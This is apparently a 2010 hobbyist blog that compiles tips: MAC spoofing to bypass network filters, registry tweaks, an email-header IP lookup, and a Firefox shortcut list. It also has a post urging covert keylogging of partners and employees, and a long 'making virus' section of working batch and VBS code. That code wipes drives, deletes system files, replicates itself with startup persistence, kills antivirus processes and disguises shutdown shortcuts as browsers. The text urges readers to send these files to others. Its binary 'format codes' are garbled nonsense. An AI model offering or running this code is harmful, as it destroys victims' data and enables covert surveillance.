Friday, July 30, 2010

Change WI-FI Mac Address

MAC address (Media Access Control address) is a quasi-unique identifier consists of a six byte number that attached to most network adapter card or network interface card (NIC). As such, all network cards, whether it’s of Ethernet NIC, Gigabit Ethernet NIC or wireless 802.11a/b/g/n WiFi or Hiper-LAN adapter, should have different MAC addresses, which also known as Ethernet Hardware Address (EHA) or adapter address.

In operating system, MAC address is often represented in 12-digit hexadecimal number. In practical usage, layer 2 MAC address is converted from layer 3 protocol addresses such as Internet Protocol (IP address) by ARP (Address Resolution Protocol), which then allowed each host to be uniquely identified and frames to be marked for specific hosts on broadcast networks, such as Ethernet. After translated (or when a host on LAN sends its MAC address to another machine which does n ot configured not to accept unrequested ARP replies on the network for preemptive caching), MAC address is cached on source PC ARP table for later use. Content of ARP table on each computer can be viewed by typing arp -a in Windows or arp in Linux. MAC address thus forms the basis of most of the layer 2 networking upon which higher OSI Layer protocols are built to produce complex, functioning networks.

There are many reasons or possibilities that an user may want to change the MAC address or a network adapter, which also known as MAC spoofing. For example, to bypass the MAC address filtering on firewall or router. The trick can be used to get pass the network access restriction by emulating a new unrestricted MAC address, or to gain access connection by spoof an authorized MAC address after sniffing the legitimate MAC address out of the air in MAC filtering Wi-Fi network.

Beside, hackers or enthusiasts also spoofing another host’s MAC address as their own in order to receive traffic packets not meant for them, although ARP poisoning technique is more commonly used. However, changing MAC address can still keep the real information from been detected and logged by various services such as IDS, firewall, DHCP server, wireless access points and etc, and is essential protect user’s privacy. MAC spoofing also potentially trigger a Denial of Service (DoS) attack by causing routing problem with duplicating MAC address exists in the network, especially those similar with gateway and AP router’s BSSID (Basic Service Set Identifier.)

Whatever the reason, it’s pretty easy to change the MAC address or perform MAC spoofing on most of today’s hardware, listed below. Actually, the original MAC address is burnt and imprinted to the network card, and cannot be changed. However, operating system can spoof as if there is different MAC address for the network interface card using tricks below.

Change the MAC address in Windows

1. Go to Start -> Control Panel. Double click on Network Connections (inside Network and Internet Connections category in Windows XP

). The, right click on the active network connection with network adapter that you want to change the MAC address (normally Local Area Network or Wireless Network Connection) and click on Properties.

Above steps work in Windows XP, Windows 2000 and Windows Server 2003. For Windows Vista, access to NIC’s properties is from Control Panel -> Network and Internet -> Network and Sharing Center -> Manage Network Connections.

Alternatively, if you already know which network adapter that’s responsible for your network or Internet connection, go to Device Manager and open the properties dialog by double click on the NIC itself.

2. In the General tab, click on the Configure button.

3. Click on Advanced tab.

4. In the Property section, select and highlight Network Address or Locally Administered Address.

5. To the right, “Not Present” radio button is by default selected as value. Change the value by clicking on radio button for Value:, and then type in a new MAC address to assign to the NIC.

Change MAC Address of Network Adapter

The MAC address consists of 6 pairs of numbers (0 – 9) and characters (A – F) combination.

6. Click OK when done.

7. To verify the change of MAC address, go to command prompt, then type in one of the following commands:

ipconfig /all

net config rdr

8. Reboot the computer if successful to make the change effective.

Note: To restore or reset back to original default MAC address, simply set back the option to “Not Present”.

Change the MAC Address of NIC in Windows via Registry

1. Open a command prompt.

2. Type the following command and hit Enter.

ipconfig /all

3. Record down the Description and the Physical Address (is MAC address) of the active network connection (discard those with Media Disconnected state).

Get MAC Address for Network Card

For example, in figure above, Description is Intel(R) Wireless WiFi Link and MAC address is in the format of XX-XX-XX-XX-XX-XX.

4. In the command prompt also, type the following command and hit Enter.

net config rdr

5. Record down the GUID for the MAC address for the active connection’s NIC which MAC address to be changed. The GUID is contained within the { and } brackets right in front of the MAC address as shown in figure below.

GUID for the NIC

6. Type regedt32 or regedit in Start -> Run box or in Start Search for Windows Vista. Note: for Windows NT 4.0 and Windows 2000, regedt32 must be used.

7. Navigate to the following registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}

8. Expand the {4D36E972-E325-11CE-BFC1-08002BE10318} tree, and there will be more sub-keys in the form of 0000, 0001, 0002 and so on.

9. Go through each sub-key starting from 0000, look for subkey that has DriverDesc value data that matches NIC description copied from step above, that want its MAC address to be changed. In most cases, it will be similar to the network adapter card name.

To verify that the subkey found is indeed a correct one, check the value of the Net-CfgInstanceId, which should have the same value with the NIC’s GUID taken from step above.

10. Once a sub-key is matched to the network interface card that MAC address want to be spoofed, select and highlight the subkey. Right click on the sub-key (for example, 0000), then select New -> String Value. Name the new value name as NetworkAddress.

Note: If NetworkAddress REG_SZ registry key is already existed in the right pane, skip this step.

11. The double click on NetworkAddress and enter a new MAC address as its value data.

Change and Spoof MAC Address in Registry

Note that the 12-digit MAC address in hexadecimal format, and should be entered without any dash (-).

12. Reboot the system to make the new MAC address effective. Alternatively, if you don’t want to restart the system, try to disable and then re-enable the network adapter in Device Manager.

13. To verify the change of MAC address, go to command prompt, then type in one of the following commands:

ipconfig /all

net config rdr

Note: To restore or reset back to true original hardware burned-in MAC address, remove the NetworkAddress registry key that is been added.

Alternative: Third party tools and utilities to change the MAC address in Windows operating system are plenty, for example: SMAC (direct download link to smac20_setup.ex, supports Windows Vista, XP, 2003, 2000), Macshift (direct download link to macshift.zip, for Windows XP), BMAC (almost identical SMAC MAC changer clone by moorer-software.com), Mac MakeUp (direct download link to macmakeup.zip, for Windows 2000/XP/2003/Vista), MadMACs (MAC Address Spoofing And Host Name Randomizing App For Windows, directly download MadMACs.zip), EtherChange (direct download link to etherchange.exe), and Technitium MAC Address Changer (for Windows 2000 / XP / Server 2003 / Vista / Server 2008).

Windows Registry Hacks

Display legal notice on startup:
Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.
REGEDIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your legal notice text"
Automatic Administrator Login:
Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
REGEDIT 4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"
No Shutdown:
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"
Menu Delays:
Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.
GPEDIT.MSC And Autoplay
A great tweaking file that comes with XP is gpedit.msc. Go to Start -> Run... and then type in 'gpedit.msc' and press enter. This is effectively the Policies Editor, and it comes in handy often. For example, if you hate CD autoplay like I do and want to permanently disable it, you can use this tool to do so. Just run gpedit.msc, then go to Computer Configuration -> Administrative Templates -> System. In here you can see the value 'Turn Off Autoplay'. Right-click on it and then click 'Properties'.
Increasing options in add/remove programs:
Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:
[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7
This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
To this:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7
Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".
Automatically Kill Programs At Shutdown:
don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1.
Speeding Up Share Viewing:
This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement!
Create a Shortcut to Lock Your Computer
Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.
Speed up Internet Explorer 8 
For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works.
Aspi
WinXP does not come with an Aspi layer. So far almost 90% of the problems with WinXP and CD burning software are Aspi layer problems. After installing WinXP, before installing any CD burning software do a few things first: 1. Open up "My computer" and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called "Recording". On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer. 2. Next install the standard Aspi layer for NT. Reboot when asked. That's is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they are currently incompatible but Roxio has promised a fix as soon as XP is released.

How to get IP Address of senders in Yahoo,Rediff or Gmail.

When you receive an email, there is lot of things apart from mail. The email comes with headers that carry important information which can tell where the email was sent from and who's the sender. For that, you need to find the IP address of the sender. The tips below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.
Finding IP address in Gmail

1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is

65.119.112.245.
That is be the IP address of the sender!
5. Track the IP address of the sender

  Finding IP address in Yahoo!

1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see similar headers like this:
Yahoo! headers : name
Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.
That is be the IP address of the sender!
6. Track the IP address of the sender

Finding IP address in Rediff !
In Rediff the you can see header just left side of senders name with the name of "Show Headers" .


Tuesday, July 27, 2010

How to use Keylogger ?

 Keyloggers have gotten a lot of bad press lately, with their association with hackers and identity theft. But the fact is that, like any tool, they can be used for good or bad purposes. Yes, some unscrupulous person could possibly put a keylogger on your computer, and that's why you have a spyware detector.

Just the same, while you could use a car to take you safely to your destination, that same car (or one very much like it) could be used by a criminal in a crime. I'm sure you would agree that this is not a good thing, but I doubt you would want to give up your car, would you? Keyloggers actually have a number of legitimate uses.

To give you an example, if you have children, a keylogger can be used to help ensure their safety. Just install the program, and it will automatically watch what they do. This lets you check up on them, and see if they're doing anything dangerous, like giving someone online their address! There are a lot of dangers on the internet today, and a keylogger can be a big help in taking care of your kids.

Even if you aren't worried about what your kids are up to, a keylogger is a useful tool in any family matters. For example, maybe you are worried that your partner is cheating on you. Well, a keylogger provides an easy way to find out! Just set it up, and it will give you immediate knowledge of who your partner talks to, and what they talk about. Much less hassle then a private eye.

Even if you have no family members you want to keep an eye on, a keylogger can be an excellent tool in other areas as well. For example, install one on your computers at work, and you'll be able to instantly spot anyone slacking. Much more important then this, though, is the ability to identify trade secret leaks and plug them before they become a problem. Now that's a useful device.

You can use a program such as Secret Agent software, from http://secretagentsoftware.com/, to simplify the task. It's a professionally done program, so all you have to do is get it set up on the computer you want to monitor. You can then immediately start following what anyone on the computer is doing.

In fact, recent software such as the Secret Agent Spy allows you to view screenshots and captured web pages as well. You can play back the users activities as if it was a DVD, fast forwarding or rewinding to what you want to see or just letting events scroll as you watch everything they were doing, hours or even days after they did it.

The stealth options that now come as standard with programs like this prevent anyone from discovering it is installed, and the ability to automatically email the results of the monitoring to an email address of your choice make plausible deniability easier then ever. No-one will find the program, and even if they did, its password protected so they could never use it!

In the end, if you are worried at all (or perhaps just curious) you should definitely get a keylogger. Even the most basic will be a big help to you, and the more advanced, modern programs have a host of additional features. The best thing to do is to think up a list of everything you want it to do, and then shop around until you find something that meets your specifications. Be sure to ask for advice in forums, and check out review sites. Where your peace of mind is at stake, don't settle for anything less then the best.
               DOWNLOAD KEYLOGGER

                                                                                          Learn all this things at INIFD Campus, Gondia 
Contact No.:  07182-320959 , 09860113218

Monday, July 26, 2010

Mozilla Firefox's Keyboard Shortcuts

  Keyboard shortcuts


CommandShortcut
Navigation
BackAlt+Left Arrow
Backspace
ForwardAlt+Right Arrow
Shift+Backspace
HomeAlt+Home
Open FileCtrl+O
ReloadF5
Ctrl+R
Reload (override cache)Ctrl+F5
Ctrl+Shift+R
StopEsc
Current Page
Go to Bottom of PageEnd
Go to Top of PageHome
Move to Next FrameF6
Move to Previous FrameShift+F6
Page Info
Page SourceCtrl+U
PrintCtrl+P
Save Page AsCtrl+S
Zoom InCtrl++
Zoom OutCtrl+-
Zoom ResetCtrl+0
Editing
CopyCtrl+C
CutCtrl+X
DeleteDelete
PasteCtrl+V
RedoCtrl+Y
Select AllCtrl+A
UndoCtrl+Z
Search
FindCtrl+F
Find AgainF3
Ctrl+G
Find As You Type Link'
Find As You Type Text/
Find PreviousShift+F3
Web SearchCtrl+K
Ctrl+E
Windows & Tabs (see Tabbed Browsing )
Close Tab Ctrl+W
Ctrl+F4
Close WindowCtrl+Shift+W
Alt+F4
Move Tab Left
(when tab is focused)
Ctrl+Left Arrow
Ctrl+Up Arrow
Move Tab Right
(when tab is focused)
Ctrl+Right Arrow
Ctrl+Down Arrow
Move Tab to Beginning
(when tab is focused)
Ctrl+Home
Move Tab to End
(when tab is focused)
Ctrl+End
New TabCtrl+T
New WindowCtrl+N
Next TabCtrl+Tab
Ctrl+Page Down
Open Address in New Tab
(from Location Bar or Search Bar)
Alt+Enter
Previous TabCtrl+Shift+Tab
Ctrl+Page Up
Undo Close TabCtrl+Shift+T
Select Tab (1 to 8)Ctrl+(1 to 8)
Select Last TabCtrl+9
Tools
Bookmark All TabsCtrl+Shift+D
Bookmark This PageCtrl+D
BookmarksCtrl+B
Ctrl+I
Library windowCtrl+Shift+B
Caret BrowsingF7
DownloadsCtrl+J
HistoryCtrl+H
Toggle Private BrowsingCtrl+Shift+P
Clear Recent HistoryCtrl+Shift+Del
Error ConsoleCtrl+Shift+J
Miscellaneous
Complete .com AddressCtrl+Enter
Complete .net AddressShift+Enter
Complete .org AddressCtrl+Shift+Enter
Delete Selected Autocomplete EntryDel
Toggle Full ScreenF11
HelpF1
Select Location BarAlt+D
F6
Ctrl+L
Select or Manage Search Engines
(when Search Bar is focused)
Alt+Up Arrow
Alt+Down Arrow
F4
Media shortcuts(OGG/Theora Videos Only)
Toggle Play / PauseSpace
Decrease volumeArrow down
Increase volumeArrow up
Mute audioCtrl+Down Arrow
Unmute audioCtrl+Arrow up
Seek back 15 secondsLeft Arrow
Seek back 10 %Ctrl+Left Arrow
Seek forward 15 secondsRight Arrow
Seek forward 10 %Ctrl+Right Arrow
Seek to the beginningHome
Seek to the endEnd

Hack with Simple Dos Ping Command ! ! !

Sunday, July 25, 2010

Batch File Tricks: Making Virus,Funny Things & lots more :

Some Funny Virus Codes
A simple binary codes that can format the system drive ,secondary drives…
Copy The Following In Notepad Exactly as it
01001011000111110010010101010101010000011111100000
Save As An EXE Any Name Will Do

Send the EXE to People And Infect
Some other interesting formatting codes….

format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001

Some more interesting stuff ..

open notepad
erase c:\windows
and save as
FINDOUTANAME.cmd

wat does it do:- will erase c:/windows .

Here is another one which is funny……

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo:
echo:
echo:
echo Deleting Root Partition…
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1…
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “Your computer has committed suicide. Have a nice day.”


This code about multiple open windows means infinite windows
until continue you restart the computer:save on denger.bat and code written in notepad

@echo off
copy 0% denger.bat
start denger.bat

This code about the computer shutdown:
@echo off
shutdown -s -t 5 -c “Shutdown”

Go to notepad and type the following:
@Echo off
Del C:\ *.*|y

save it as Dell.bat
Want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file
One more …
try one this
Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q

then it is complete Save as any file you want in .bat format.. n enjoy.its really dangerous don’t try on your own pc.

NOTE :-  Howto add your own created viruses into start ups this will make it difficult to detect them n to remove them …
For this u need a registry updater software .
now move your .bat file to c:/windows and then simply run this software ur virsu will be added to your start ups i tried this with shut down , as my comp starts its shut down after 2 secs ..

Do not try it on your PC. Don’t mess around this is for educational purpose only




Batch VIRUS Killing “ NORTON, LIMEWIRE, EXPLORER, MSN “
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP



It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer



The first code we are going to look at is one that makes the cd tray open and close repeatedly until shutdown, or
(don’t tell your friends, you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs)


Set oWMP = CreateObject(”WMPlayer.OCX.7″ )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
loop
end if

A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”

loop



A batch that is like a computer password, maybe you could stick it in autoexec.exe and make it run off startup?

@Echo off
echo Enter password then [F6] and then smack the [Enter] key real hard!
prompt $e[30m
echo on
echo off
copy con password.dat>nul
prompt $e[0m
echo on
echo off
cls
copy password.set+password.dat password.bat>nul
call password.bat
if '%password%==qwerty goto done
echo Incorrect, you are not trying to break into my pc are you?
choice /t:y,3
if errorlevel 2 goto next
:next
erase password.bat
erase password.dat
:hello
cls
echo Turn off PC
goto hello
:done
erase password.dat
erase password.bat
set password=qwerty
prompt $p$g


A batch that switches the left mouse button with your right mouse button (also maybe add a code to stick in someones autoexec,
that would really make them mad)


@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * this is gunna screw you up
msg * good look finding how to fix it



A batch file that will shutdown your computer and send a few messages about the matrix, rather bland and could be worked on a little bit more, some one
could tweak it a little and i'll repost it and give you credit, perhaps change the dos txt to green

@ Echo off
Title Matrix
msg * The matrix has you, you can not escape
rundll32.exe disable mouse
Attrib +h C:*.*
echo deleting harddrive
echo 1001101010101011111111101010101
echo 010101010101010101010101010111
assoc
assoc
Attrib C:Documents and settings*.*
net share hack=C:
shutdown -s -c 60



This is a VBs file so of course save as VBS, you can replace the txt in this code with whatever you want

Set wshshell = wscript.CreateObject("WScript.Shell")
Wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "M"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 120
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys "o"
wscript.sleep 140
wshshell.sendkeys "n"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "P"
wscript.sleep 200
wshshell.sendkeys "w"
wscript.sleep 150
wshshell.sendkeys "n"
wscript.sleep 170
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "A"
wscript.sleep 50
wshshell.sendkeys "l"
wscript.sleep 120
wshshell.sendkeys "l"
wscript.sleep 160
wshshell.sendkeys " "
wscript.sleep 200
wshshell.sendkeys "N"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "w"
wscript.sleep 200
wshshell.sendkeys "b"
wscript.sleep 120
wshshell.sendkeys "s"



Carpet Bomb:
Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it'll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include "disinf" for erasing all of the copies permanently.
@ECHO OFF
:This was meant as a harmless joke, and it's not hard to fix if you read through the code.
:If you just use the "disinf" argument on the command line all is well.
lease only use this on people u don't like
IF "%1"=="" GOTO fill
IF "%1"=="fill" GOTO fill
IF "%1"=="kill" GOTO kill
IF "%1"=="inf" GOTO inf
IF "%1"=="disinf" GOTO kill
GOTO bye
:fill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="" GOTO inf
GOTO theend
:kill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="disinf" GOTO disinf
GOTO theend
:inf
TYPE "%~df0" > "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:disinf
ECHO Y | DEL "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:bye
ECHO "fill" to make more and "kill" to get rid of 'em. inf to make it stick a little longer ;)
:theend

Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it'll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include "disinf" for erasing all of the copies permanently.\
Creating a batch Bomb
Copy and paste the below into notepad and save it as hi.bat (Not .txt)
run it, and enjoy anarchy.


Code:
@echo off
:START
echo Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!
start hi.bat
GOTO START



A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

How to make a shutdown file and disguise it as something else!
This article is a pretty simple one, maybe most of you guys know already... in case if you don't know, you can play around and make fun...
How to make a shutdown file and disguise it as something else (internet, etc.)
Step 1: Right click on your desktop or wherever you want to make this shutdown file
Step 2: look for new, then shortcut
Step 3: Type shutdown -s -t 10 -c "text here"
note: you can add -f to force close open docuuments
note: after -t you can put any amount of seconds you want before the computer shuts down

Step 4: push next, then name it whatever you like, for an example we will put Internet Explorer
Step 4: Right click on the file you just made and goto properties
Step 5: hit change icon. (This could be under the advanced tab)
Step 6: An error message should pop up letting you know there aren't any pictures for c:\windows\system32. Hit ok
Step 7: A list of icons should show up.. click on the one you think looks the most persuasive according to what you named it. (For example, look for the 'e' icon for internet explorer.
Now your done, see that wasn't that hard! was it?
Put this in the start up folder to make people even MORE mad!


NOTE:- This can easily be stopped by typing shutdown -a in run...

